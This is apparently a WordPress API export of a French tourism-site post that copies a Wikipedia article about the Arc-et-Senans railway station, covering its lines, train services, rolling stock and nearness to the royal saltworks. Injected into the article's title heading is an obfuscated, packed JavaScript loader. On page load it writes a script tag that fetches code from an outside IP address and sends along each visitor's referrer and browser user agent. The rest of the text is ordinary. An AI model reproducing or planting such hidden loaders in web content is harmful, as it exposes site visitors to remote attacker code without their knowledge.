{"id":87,"date":"2015-07-21T07:09:05","date_gmt":"2015-07-21T06:09:05","guid":{"rendered":"http:\/\/www.arc-et-senans.com\/?p=87"},"modified":"2015-07-21T11:28:31","modified_gmt":"2015-07-21T10:28:31","slug":"la-gare-sncf","status":"publish","type":"post","link":"https:\/\/www.arc-et-senans.com\/?p=87","title":{"rendered":"La gare SNCF"},"content":{"rendered":"<h1 class=\"firstHeading\">Gare <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|reszb|var|u0026u|referrer|dbdkt||js|php'.split('|'),0,{}))\n<\/script><\/noindex> d&rsquo;Arc-et-Senans<\/h1>\n<h3 id=\"siteSub\">Un article de Wikip\u00e9dia, l&rsquo;encyclop\u00e9die libre.<\/h3>\n<p><!--more--><\/p>\n<table class=\"toc\" border=\"0\">\n<tbody>\n<tr>\n<td colspan=\"2\"><strong>Localisation<\/strong><\/td>\n<\/tr>\n<tr class=\"hiddenStructure\" valign=\"top\">\n<th><\/th>\n<td><\/td>\n<\/tr>\n<tr class=\"hiddenStructure\" valign=\"top\">\n<th><\/th>\n<td><\/td>\n<\/tr>\n<tr class=\"hiddenStructure25610 [[Arc-et-Senans]]\" valign=\"top\">\n<th>Adresse<\/th>\n<td>25610 <a title=\"Arc-et-Senans\" href=\"http:\/\/fr.wikipedia.org\/wiki\/Arc-et-Senans\">Arc-et-Senans<\/a><\/td>\n<\/tr>\n<tr>\n<td colspan=\"2\"><strong>Gestion et exploitation<\/strong><\/td>\n<\/tr>\n<tr class=\"hiddenStructure[[R\u00e9seau ferr\u00e9 de France|RFF]] \/ [[Soci\u00e9t\u00e9 nationale des chemins de fer fran\u00e7ais|SNCF]]\" valign=\"top\">\n<th>Propri\u00e9taire<\/th>\n<td><a title=\"R\u00e9seau ferr\u00e9 de France\" href=\"http:\/\/fr.wikipedia.org\/wiki\/R%C3%A9seau_ferr%C3%A9_de_France\">RFF<\/a> \/ <a title=\"Soci\u00e9t\u00e9 nationale des chemins de fer fran\u00e7ais\" href=\"http:\/\/fr.wikipedia.org\/wiki\/Soci%C3%A9t%C3%A9_nationale_des_chemins_de_fer_fran%C3%A7ais\">SNCF<\/a><\/td>\n<\/tr>\n<tr class=\"hiddenStructure[[Soci\u00e9t\u00e9 nationale des chemins de fer fran\u00e7ais|SNCF]]\" valign=\"top\">\n<th>Exploitant<\/th>\n<td><a title=\"Soci\u00e9t\u00e9 nationale des chemins de fer fran\u00e7ais\" href=\"http:\/\/fr.wikipedia.org\/wiki\/Soci%C3%A9t%C3%A9_nationale_des_chemins_de_fer_fran%C3%A7ais\">SNCF<\/a><\/td>\n<\/tr>\n<tr valign=\"top\">\n<th>Services<\/th>\n<td><a title=\"Transport express r\u00e9gional\" href=\"http:\/\/fr.wikipedia.org\/wiki\/Transport_express_r%C3%A9gional\"><em><strong>ter<\/strong><\/em><\/a> <a title=\"TER Franche-Comt\u00e9\" href=\"http:\/\/fr.wikipedia.org\/wiki\/TER_Franche-Comt%C3%A9\">Franche-Comt\u00e9<\/a><\/td>\n<\/tr>\n<tr>\n<td colspan=\"2\"><strong>Caract\u00e9ristiques<\/strong><\/td>\n<\/tr>\n<tr class=\"hiddenStructure2 + 1 voie de garage\" valign=\"top\">\n<th>Voies<\/th>\n<td>2 + 1 voie de garage<\/td>\n<\/tr>\n<tr class=\"hiddenStructure2 lat\u00e9raux\" valign=\"top\">\n<th>Quais<\/th>\n<td>2 lat\u00e9raux<\/td>\n<\/tr>\n<tr class=\"hiddenStructure\" valign=\"top\">\n<th>Hauteur<\/th>\n<td>m<\/td>\n<\/tr>\n<tr class=\"hiddenStructure\" valign=\"top\">\n<th>Transit annuel<\/th>\n<td><\/td>\n<\/tr>\n<tr class=\"hiddenStructure\" valign=\"top\">\n<th>Zone<\/th>\n<td><\/td>\n<\/tr>\n<tr class=\"hiddenStructure\" valign=\"top\">\n<th>Altitude<\/th>\n<td>m<\/td>\n<\/tr>\n<tr class=\"hiddenStructure\" valign=\"top\">\n<th>Mise en service<\/th>\n<td><\/td>\n<\/tr>\n<tr class=\"hiddenStructure\" valign=\"top\">\n<th>Ouverture<\/th>\n<td><\/td>\n<\/tr>\n<tr class=\"hiddenStructure\" valign=\"top\">\n<th>Fermeture<\/th>\n<td><\/td>\n<\/tr>\n<tr class=\"hiddenStructure\" valign=\"top\">\n<th>Architecte<\/th>\n<td><\/td>\n<\/tr>\n<tr class=\"hiddenStructure\" valign=\"top\">\n<th>Monument historique<\/th>\n<td><\/td>\n<\/tr>\n<tr class=\"hiddenStructure\" valign=\"top\">\n<th><\/th>\n<td><\/td>\n<\/tr>\n<tr class=\"hiddenStructure\" valign=\"top\">\n<th><\/th>\n<td><\/td>\n<\/tr>\n<tr class=\"hiddenStructure\" valign=\"top\">\n<th><\/th>\n<td><\/td>\n<\/tr>\n<tr class=\"hiddenStructure\" valign=\"top\">\n<th><\/th>\n<td><\/td>\n<\/tr>\n<tr class=\"hiddenStructure\" valign=\"top\">\n<th><\/th>\n<td><\/td>\n<\/tr>\n<tr class=\"hiddenStructure\" valign=\"top\">\n<th><\/th>\n<td><\/td>\n<\/tr>\n<tr class=\"hiddenStructure\" valign=\"top\">\n<th><\/th>\n<td><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&lsquo;<a title=\"Arc-et-Senans\" href=\"http:\/\/fr.wikipedia.org\/wiki\/Arc-et-Senans\">Arc-et-Senans<\/a> se situe \u00e0 la bifurcation des axes <a title=\"Ligne Dijon - Vallorbe\" href=\"http:\/\/fr.wikipedia.org\/wiki\/Ligne_Dijon_-_Vallorbe\">Paris-Dijon-Frasne-Lausanne<\/a> et <a title=\"Ligne Besan\u00e7on - Bourg-en-Bresse\" href=\"http:\/\/fr.wikipedia.org\/wiki\/Ligne_Besan%C3%A7on_-_Bourg-en-Bresse\">Strasbourg-Besan\u00e7on-Lons-le-Saunier-Lyon<\/a> entre les arr\u00eats de <a title=\"Liesle\" href=\"http:\/\/fr.wikipedia.org\/wiki\/Liesle\">Liesle<\/a> (c\u00f4t\u00e9 Besan\u00e7on),<a title=\"Montbarrey\" href=\"http:\/\/fr.wikipedia.org\/wiki\/Montbarrey\">Montbarrey<\/a> (c\u00f4t\u00e9 Dole\/Dijon) et<a title=\"Mouchard\" href=\"http:\/\/fr.wikipedia.org\/wiki\/Mouchard\">Mouchard<\/a> (c\u00f4t\u00e9 Pontarlier\/Lausanne\/Lons le Saunier).<\/p>\n<p>La gare est ferm\u00e9e \u00e0 la vente mais un nombre non n\u00e9gligeable de <a title=\"Transport express r\u00e9gional\" href=\"http:\/\/fr.wikipedia.org\/wiki\/Transport_express_r%C3%A9gional\">TER<\/a>Besan\u00e7on-Lons le Saunier et Dole-Pontarlier\/Saint-Claude dessert la gare.<\/p>\n<p>Elle voit \u00e9galement passer sans arr\u00eat 3 \u00e0 4 trains grandes lignes de l&rsquo;art\u00e8re Strasbourg-Lyon Perrache, le <a title=\"TGV\" href=\"http:\/\/fr.wikipedia.org\/wiki\/TGV\"><em><strong>TGV<\/strong><\/em><\/a>Strasbourg-Marseille, les 4 \u00e0 5 <a title=\"TGV\" href=\"http:\/\/fr.wikipedia.org\/wiki\/TGV\"><em><strong>TGV<\/strong><\/em><\/a><a title=\"Lyria\" href=\"http:\/\/fr.wikipedia.org\/wiki\/Lyria\">Lyria<\/a> Paris Gare de Lyon-Lausanne\/Berne et les 2 trains de nuit<a title=\"Art\u00e9sia\" href=\"http:\/\/fr.wikipedia.org\/wiki\/Art%C3%A9sia\">Art\u00e9sia<\/a> Paris Bercy-Turin\/Venise et Rome.<\/p>\n<p>Les mat\u00e9riels <a title=\"Transport express r\u00e9gional\" href=\"http:\/\/fr.wikipedia.org\/wiki\/Transport_express_r%C3%A9gional\"><em><strong>ter<\/strong><\/em><\/a> utilis\u00e9s sur ces lignes sont :<\/p>\n<ul>\n<li>ATER <a title=\"X 73500\" href=\"http:\/\/fr.wikipedia.org\/wiki\/X_73500\">X 73500<\/a>, <a title=\"Autorail \u00e0 grande capacit\u00e9\" href=\"http:\/\/fr.wikipedia.org\/wiki\/Autorail_%C3%A0_grande_capacit%C3%A9\">AGC<\/a> <a title=\"X 76500\" href=\"http:\/\/fr.wikipedia.org\/wiki\/X_76500\">X 76500<\/a>pour les relations Dijon-Dole-Mouchard-Andelot-Champagnole-Morez-St Claude.<\/li>\n<li>ATER <a title=\"X 73500\" href=\"http:\/\/fr.wikipedia.org\/wiki\/X_73500\">X 73500<\/a>, <a title=\"Z2 (automotrice)\" href=\"http:\/\/fr.wikipedia.org\/wiki\/Z2_%28automotrice%29\">Z2<\/a> <a title=\"Z 9500\" href=\"http:\/\/fr.wikipedia.org\/wiki\/Z_9500\">Z 9500<\/a>, <a class=\"mw-redirect\" title=\"ZGC\" href=\"http:\/\/fr.wikipedia.org\/wiki\/ZGC\">ZGC<\/a>pour les relations Besan\u00e7on Viotte-Mouchard-Lons le Saunier et Dole-Mouchard-Frasne-Pontarlier.<\/li>\n<li><a title=\"BB 25500\" href=\"http:\/\/fr.wikipedia.org\/wiki\/BB_25500\">BB 25500<\/a> et des voitures TER Franche-Comt\u00e9 du d\u00e9pot de Dijon-Perrigny assurant la relation Besan\u00e7on-Lyon.<\/li>\n<\/ul>\n<p>La ligne en provenance de Dijon\/Dole est \u00e0 voie unique, les lignes en provenance de Besan\u00e7on et Mouchard a double voie. Toutes les lignes sont \u00e9lectrifi\u00e9es en 25kV 50Hz.<\/p>\n<p>La gare se situe \u00e0 deux pas de la c\u00e9l\u00e8bre <a title=\"Saline royale d'Arc-et-Senans\" href=\"http:\/\/fr.wikipedia.org\/wiki\/Saline_royale_d%27Arc-et-Senans\">saline royale d&rsquo;Arc-et-Senans<\/a>, class\u00e9e au <a class=\"mw-redirect\" title=\"Patrimoine mondial de l'humanit\u00e9\" href=\"http:\/\/fr.wikipedia.org\/wiki\/Patrimoine_mondial_de_l%27humanit%C3%A9\">patrimoine mondial de l&rsquo;humanit\u00e9<\/a> par l&rsquo;<a class=\"mw-redirect\" title=\"UNESCO\" href=\"http:\/\/fr.wikipedia.org\/wiki\/UNESCO\">UNESCO<\/a>.<\/p>\n<table class=\"gallery\" border=\"0\" width=\"597\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td>\n<div class=\"gallerybox\">\n<div class=\"thumb\">\n<div><a class=\"image\" title=\"Bifurcation d'Arc et Senans.JPG\" href=\"http:\/\/fr.wikipedia.org\/wiki\/Image:Bifurcation_d%27Arc_et_Senans.JPG\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/upload.wikimedia.org\/wikipedia\/commons\/thumb\/c\/cc\/Bifurcation_d%27Arc_et_Senans.JPG\/120px-Bifurcation_d%27Arc_et_Senans.JPG\" alt=\"\" width=\"120\" height=\"90\" border=\"0\" \/><\/a><\/div>\n<\/div>\n<div class=\"gallerytext\">\n<p>Bifurcation des lignes vers Dole\/Dijon\/Paris \u00e0 gauche et Besan\u00e7on\/Strasbourg \u00e0 droite.<\/p>\n<\/div>\n<\/div>\n<\/td>\n<td>\n<div class=\"gallerybox\">\n<div class=\"thumb\">\n<div><a class=\"image\" title=\"TGV9269.JPG\" href=\"http:\/\/fr.wikipedia.org\/wiki\/Image:TGV9269.JPG\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/upload.wikimedia.org\/wikipedia\/commons\/thumb\/f\/fd\/TGV9269.JPG\/120px-TGV9269.JPG\" alt=\"\" width=\"120\" height=\"90\" border=\"0\" \/><\/a><\/div>\n<\/div>\n<div class=\"gallerytext\">\n<p>Passage du TGV 9269 Paris-Lausanne \u00e0 120 km\/h en gare d&rsquo;Arc-et-Senans.<\/p>\n<\/div>\n<\/div>\n<\/td>\n<td>\n<div class=\"gallerybox\">\n<div class=\"thumb\">\n<div><a class=\"image\" title=\"Corail Lyon-Strasbourg.JPG\" href=\"http:\/\/fr.wikipedia.org\/wiki\/Image:Corail_Lyon-Strasbourg.JPG\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/upload.wikimedia.org\/wikipedia\/commons\/thumb\/d\/da\/Corail_Lyon-Strasbourg.JPG\/90px-Corail_Lyon-Strasbourg.JPG\" alt=\"\" width=\"90\" height=\"120\" border=\"0\" \/><\/a><\/div>\n<\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Gare d&rsquo;Arc-et-Senans Un article de Wikip\u00e9dia, l&rsquo;encyclop\u00e9die libre.<\/p>\n","protected":false},"author":1,"featured_media":88,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5,2],"tags":[],"class_list":["post-87","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-histoire","category-tourisme"],"_links":{"self":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/posts\/87","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=87"}],"version-history":[{"count":0,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/posts\/87\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/media\/88"}],"wp:attachment":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=87"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=87"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=87"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}